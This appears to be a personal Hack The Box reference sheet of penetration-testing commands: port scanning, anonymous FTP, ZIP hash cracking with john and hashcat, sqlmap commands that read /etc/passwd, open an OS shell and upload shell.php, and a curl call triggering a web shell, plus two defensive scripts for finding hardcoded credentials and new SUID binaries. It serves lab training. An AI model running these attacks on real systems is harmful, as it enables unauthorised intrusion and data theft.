
HTB Commands Summary

Network Scanning

nmap

What: Network port scanner and service detection tool

Common flags:

nmap -sC -sV <IP>              # Script scan + version detection
nmap -p- <IP>                   # Scan all 65535 ports
nmap -p- --min-rate=1000 <IP>   # Fast full scan: send at least 1000 packets/sec
nmap -Pn <IP>                   # Skip ping, treat host as up
nmap -sS <IP>                   # SYN stealth scan (requires sudo)
nmap -T4 <IP>                   # Timing template (0-5; higher is faster and noisier)
nmap -oN output.txt <IP>        # Save output to file

Use case: Discover open ports and services on target before exploitation


rustscan

What: Fast port scanner written in Rust, feeds results to nmap

Install:

cargo install rustscan

Common flags:

rustscan -a <IP>                        # Basic scan
rustscan -a <IP> -- -sC -sV             # Pass nmap flags after --
rustscan --ulimit 5000 -a <IP>          # Increase file descriptor limit

Use case: Quick port discovery (faster than nmap alone), then detailed nmap scan


File Transfer & Access

ftp

What: File Transfer Protocol client for accessing FTP servers

Usage:

ftp <IP>                        # Connect to FTP server
ftp <IP> <PORT>                 # Connect with custom port

Inside FTP:

ls                              # List files
get <file>                      # Download file
put <file>                      # Upload file
binary                          # Set binary mode (for executables)
ascii                           # Set text mode
mget *                          # Download all files
cd <dir>                        # Change directory
bye                             # Exit

Use case: Download files from vulnerable FTP servers, often anonymous login allowed


Password Cracking

zip2john

What: Extract hash from password-protected ZIP files for cracking

Usage:

zip2john file.zip > hash.txt    # Extract hash to file

Use case: Prepare ZIP file for password cracking with john


john (John the Ripper)

What: Password cracking tool (CPU-based)

Common usage:

john hash.txt                                   # Auto-detect and crack
john --wordlist=rockyou.txt hash.txt            # Dictionary attack
john --format=raw-MD5 hash.txt                  # Specify hash format
john --show hash.txt                            # Show cracked passwords

Common formats:

- raw-MD5: MD5 hashes
- raw-SHA256: SHA256 hashes
- bcrypt: bcrypt hashes

Location after compiling:

~/john/run/john                 # Compiled binary
~/john/run/zip2john             # Helper scripts

Use case: Crack weak passwords from extracted hashes


hashcat

What: Advanced password cracking tool (GPU-accelerated)

Common flags:

hashcat -m 0 hash.txt wordlist.txt              # MD5 cracking
hashcat -m 1400 hash.txt wordlist.txt           # SHA256
hashcat -m 0 hash.txt wordlist.txt --show       # Show cracked
hashcat -I                                      # List devices (GPU/CPU)

Hash modes:

- -m 0: MD5
- -m 100: SHA1
- -m 1400: SHA256
- -m 1000: NTLM
- -m 17200: PKZIP

Use case: Fast GPU-based password cracking (10-100x faster than john)


SQL Injection

sqlmap

What: Automated SQL injection and database takeover tool

Common flags:

sqlmap -u "http://IP/page.php?id=1"                     # Test URL
sqlmap -u "URL" --cookie="PHPSESSID=xyz" --batch        # With cookie, non-interactive
sqlmap -u "URL" --dbs                                   # List databases
sqlmap -u "URL" -D dbname --tables                      # List tables
sqlmap -u "URL" -D dbname -T users --dump               # Dump table
sqlmap -u "URL" --os-shell                              # Get OS shell
sqlmap -u "URL" --file-read="/etc/passwd"               # Read files
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/html/s.php"  # Upload file

Useful flags:

- --batch: Non-interactive mode
- --dbs: Enumerate databases
- --tables: List tables
- --dump: Extract data
- --os-shell: Interactive shell (unstable)
- --file-read: Read files from server
- --file-write / --file-dest: Upload files

Downloaded files location:

~/.local/share/sqlmap/output/<IP>/files/

Use case: Exploit SQL injection to extract data, read files, or get shell access


Data Extraction & Analysis

curl

What: Transfer data from/to servers, make HTTP requests

Common usage:

curl -i <URL>                                   # Include headers
curl -X POST <URL> -d "user=admin&pass=123"     # POST request
curl -i -X POST <URL> -d "data"                 # POST with headers (get cookies)
curl "http://IP/shell.php?cmd=whoami"           # Execute web shell command

Use case: Test web services, extract cookies, trigger web shells


grep

What: Search text patterns in files

Common usage:

grep "password" file.txt        # Search for pattern
grep -i "password" file.txt     # Case insensitive
grep -r "password" /path/       # Recursive search
cat file.php | grep password    # Search in pipe output

Use case: Find credentials, connection strings in source code
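The grep commands above only match the literal word "password". As an added example (not part of the original cheat sheet), the function below runs one grep -E pass over a source tree with patterns for PHP-style password assignments, mysqli_connect() calls and credentials embedded in URLs, which is the same check a code reviewer or secret scanner applies to catch hardcoded credentials before they ship. The sample PHP and notes files are constructed inline so it runs offline.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: scan a source tree for
# likely hardcoded credentials with one grep -E run instead of a bare
# "grep password". The patterns and the sample files are constructed here.

# Patterns (ERE):
#  1. $something_pass / $pwd / $secret assignments with a double-quoted literal
#  2. mysql_connect( / mysqli_connect( calls
#  3. URL-embedded credentials of the form scheme://user:pass@host
SECRET_PATTERNS='\$[a-zA-Z_]*(pass|pwd|secret)[a-zA-Z_]*[[:space:]]*=[[:space:]]*"[^"]+"|mysqli?_connect\(|[a-z]+://[^/[:space:]]+:[^/@[:space:]]+@'

# scan_secrets DIR: print matching lines as file:line:text
# (-r recursive, -n line numbers, -I skip binary files, -E extended regex).
scan_secrets() {
    grep -rnIE "$SECRET_PATTERNS" "$1" 2>/dev/null
}

# count_secrets DIR: number of matching lines (tr strips BSD wc padding).
count_secrets() {
    scan_secrets "$1" | wc -l | tr -d ' '
}

# make_sample: build a constructed sample tree and print its path.
make_sample() {
    dir=$(mktemp -d)
    cat > "$dir/config.php" <<'EOF'
<?php
$db_host = "localhost";
$db_user = "webapp";
$db_pass = "S3cretPassw0rd";
$conn = mysqli_connect($db_host, $db_user, $db_pass, "appdb");
// reminder: rotate passwords quarterly
EOF
    cat > "$dir/notes.txt" <<'EOF'
backup target: ftp://backup:hunter2@10.0.0.5/dumps
no password here, just the word password in a comment
EOF
    printf '%s\n' "$dir"
}

# Usage: d=$(make_sample); scan_secrets "$d"; rm -rf "$d"
# Expected hits: the $db_pass assignment, the mysqli_connect line and the
# ftp:// URL; the two comment lines that merely contain "password" do not match.
```

Patterns 1 and 3 only fire on a literal next to the keyword, so a comment that merely mentions passwords is not reported; a real scan of /var/www/ will still need the list extended for the frameworks in use.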


cat

What: Display file contents

Common usage:

cat file.txt                    # Display file
cat file.txt | grep pattern     # Pipe to grep

Use case: Read config files, extracted data, credentials


wc

What: Count lines, words, characters

Common usage:

wc -l file.txt                  # Count lines

Use case: Verify wordlist size, check data extraction


File Operations

unzip

What: Extract ZIP archives

Common usage:

unzip file.zip                  # Extract all
unzip -l file.zip               # List contents

Use case: Extract downloaded archives from FTP/HTTP


chmod

What: Change file permissions

Common usage:

chmod +x script.sh              # Make executable
chmod 755 file                  # rwxr-xr-x

Use case: Make downloaded scripts/tools executable


find

What: Search for files and directories

Common usage:

find / -name "*.txt" 2>/dev/null            # Find files by name
find / -name "*flag*" 2>/dev/null           # Search for flags
find / -perm -4000 2>/dev/null              # Find SUID binaries (privesc)

Use case: Locate flags, find privilege escalation vectors
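The find -perm -4000 query above is also the standard way a defender audits a host for SUID binaries. As an added example (not part of the original cheat sheet), the functions below record the SUID set under a directory as a baseline file and later report anything that has appeared since, which is how an unexpected SUID binary gets detected. The directory tree, the "expected" and "rogue" files and the baseline path are all constructed inline so the example runs offline; on a real host you would run list_suid against / instead.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet: use "find -perm -4000"
# defensively by keeping a baseline of SUID files and reporting new ones.
# The sample tree and file names below are constructed for the example.

# list_suid DIR: sorted paths of regular files under DIR with the SUID bit set.
# Output is sorted because comm(1) requires sorted input.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# save_baseline DIR FILE: record the current SUID set into FILE.
save_baseline() {
    list_suid "$1" > "$2"
}

# new_suid DIR FILE: SUID files present now but absent from the baseline
# (comm -13 suppresses lines unique to FILE and lines common to both).
new_suid() {
    list_suid "$1" | comm -13 "$2" -
}

# count_new_suid DIR FILE: number of unexpected SUID files.
count_new_suid() {
    new_suid "$1" "$2" | wc -l | tr -d ' '
}

# make_sample: constructed tree with one expected SUID file; prints its path.
make_sample() {
    dir=$(mktemp -d)
    mkdir -p "$dir/bin" "$dir/tmp"
    printf '#!/bin/sh\necho hi\n' > "$dir/bin/expected"
    chmod 4755 "$dir/bin/expected"      # SUID + rwxr-xr-x, part of the baseline
    printf '#!/bin/sh\necho hi\n' > "$dir/tmp/ordinary"
    chmod 755 "$dir/tmp/ordinary"       # no SUID bit, never reported
    printf '%s\n' "$dir"
}

# add_rogue DIR: simulate a SUID file that appeared after the baseline was taken.
add_rogue() {
    printf '#!/bin/sh\necho hi\n' > "$1/tmp/rogue"
    chmod 4755 "$1/tmp/rogue"
}

# Usage:
#   d=$(make_sample); save_baseline "$d" "$d/baseline.txt"
#   add_rogue "$d"; new_suid "$d" "$d/baseline.txt"   # prints .../tmp/rogue
#   rm -rf "$d"
```

A baseline taken right after installation and re-checked on a schedule turns the one-off privesc enumeration into a cheap integrity check; the same diff logic applies to SGID files with -perm -2000.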


Environment & Workflow

export

What: Set environment variables

Common usage:

export IP=10.129.23.11          # Set target IP variable
echo $IP                        # Use variable

Use case: Store target IP for quick reference in commands


which

What: Locate command binary path

Common usage:

which john                      # Find john binary location
which zip2john                  # Check if tool installed

Use case: Verify tool installation, find binary paths


Git (For Tool Management)

git clone

What: Clone repository

Common usage:

git clone https://github.com/openwall/john.git
git clone <repo_url>

Use case: Download tools from GitHub (john, exploits, scripts)


git submodule

What: Initialize submodules in repo

Common usage:

git submodule update --init --recursive

Use case: Required for some tools like john that use submodules


Compilation

make

What: Build software from source

Common flags:

make                            # Build with defaults
make clean                      # Clean build artifacts
make -j4                        # Use 4 cores
make -j$(nproc)                 # Use all CPU cores
sudo make install               # Install compiled binaries

Use case: Compile john the ripper, custom exploits, tools


cmake

What: Cross-platform build system generator

Common usage:

cmake ..                        # Generate build files; run from a build/ subdir with sources in the parent
cmake . && make                 # Configure and build

Use case: Build complex projects that require cmake (input-leap, some exploits)


Apt Package Management

apt install

What: Install packages on Debian/Ubuntu

Common usage:

sudo apt install <package>              # Install package
sudo apt update                         # Update package lists
sudo apt upgrade                        # Upgrade installed packages
sudo apt remove <package>               # Remove package

Installed tools:

- john: Password cracker
- hashcat: GPU password cracker
- sqlmap: SQL injection tool
- nmap: Port scanner
- ftp: FTP client
- git: Version control
- build-essential: Compilation tools


Wordlists

rockyou.txt

What: 14 million password wordlist (most common for HTB)

Download:

curl -L -o ~/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Location after download:

~/rockyou.txt

Use case: Primary wordlist for password cracking on HTB


SecLists

What: Comprehensive security testing wordlists and payloads

Download:

git clone https://github.com/danielmiessler/SecLists.git ~/SecLists

Use case: Additional wordlists, directory brute force lists, fuzzing payloads


HTB Workflow Example

# 1. Set target IP
export IP=10.129.23.11

# 2. Quick port scan
rustscan -a $IP -- -sC -sV

# 3. Access FTP if open
ftp $IP
# Login: anonymous / <blank>
# get files

# 4. Extract protected ZIP
zip2john backup.zip > hash.txt

# 5. Crack password
~/john/run/john --wordlist=~/rockyou.txt hash.txt

# 6. Show cracked password
~/john/run/john --show hash.txt

# 7. Unzip with password
unzip backup.zip

# 8. Search for credentials
cat index.php | grep password

# 9. Test SQLi with sqlmap
curl -i -X POST http://$IP/index.php -d "username=admin&password=pass"
sqlmap -u "http://$IP/dashboard.php?search=test" --cookie="PHPSESSID=abc123" --os-shell

# 10. Exploit and get flags

Quick Reference

Recon:

export IP=<target>
rustscan -a $IP -- -sC -sV

File download:

ftp $IP
wget http://$IP/file
curl -O http://$IP/file

Password cracking:

zip2john file.zip > hash.txt
~/john/run/john --wordlist=~/rockyou.txt hash.txt

SQL injection:

sqlmap -u "http://$IP/page.php?id=1" --dbs --batch
sqlmap -u "..." --file-read="/etc/passwd"

Search files:

cat file.php | grep password
grep -r "password" /var/www/
find / -name "*flag*" 2>/dev/null


HTB Commands Reference - January 2026